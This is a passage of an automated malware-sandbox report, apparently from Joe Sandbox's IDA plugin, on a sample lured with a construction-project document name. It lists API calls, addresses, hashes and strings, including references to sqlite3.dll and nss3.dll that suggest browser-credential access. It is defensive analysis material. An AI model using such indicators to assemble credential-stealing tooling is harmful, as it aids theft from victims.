                                                                                                                          • Opcode ID: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                                                          • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                                                          • Opcode Fuzzy Hash: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                                                          • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                                                          APIs
                                                                                                                          • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                          • sprintf.MSVCRT ref: 0040909B
                                                                                                                            • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                                            • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                                            • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                                            • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                                            • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                                            • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                                            • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                          • String ID: menu_%d
                                                                                                                          • API String ID: 1129539653-2417748251
                                                                                                                          • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                          • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                                                          • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                          • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                                          APIs
                                                                                                                          • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                            • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                            • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                          • _mbscat.MSVCRT ref: 004070FA
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: _mbscat$_mbscpystrlen
                                                                                                                          • String ID: sqlite3.dll
                                                                                                                          • API String ID: 1983510840-1155512374
                                                                                                                          • Opcode ID: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                                                          • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                                                          • Opcode Fuzzy Hash: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                                                          • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                                                          APIs
                                                                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 004073D0
                                                                                                                          • SetWindowLongA.USER32(00000001,000000EC,00000000), ref: 004073E2
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: LongWindow
                                                                                                                          • String ID: MZ@
                                                                                                                          • API String ID: 1378638983-2978689999
                                                                                                                          APIs
                                                                                                                          • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfileString
                                                                                                                          • String ID: A4@$Server Details
                                                                                                                          • API String ID: 1096422788-4071850762
                                                                                                                          APIs
                                                                                                                          • strlen.MSVCRT ref: 0040849A
                                                                                                                          • memset.MSVCRT ref: 004084D2
                                                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,75A8EB20,?,00000000), ref: 0040858F
                                                                                                                          • LocalFree.KERNEL32(00000000,?,?,?,?,75A8EB20,?,00000000), ref: 004085BA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3110682361-0
                                                                                                                          APIs
                                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                                          • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                                          • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                                          • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3510742995-0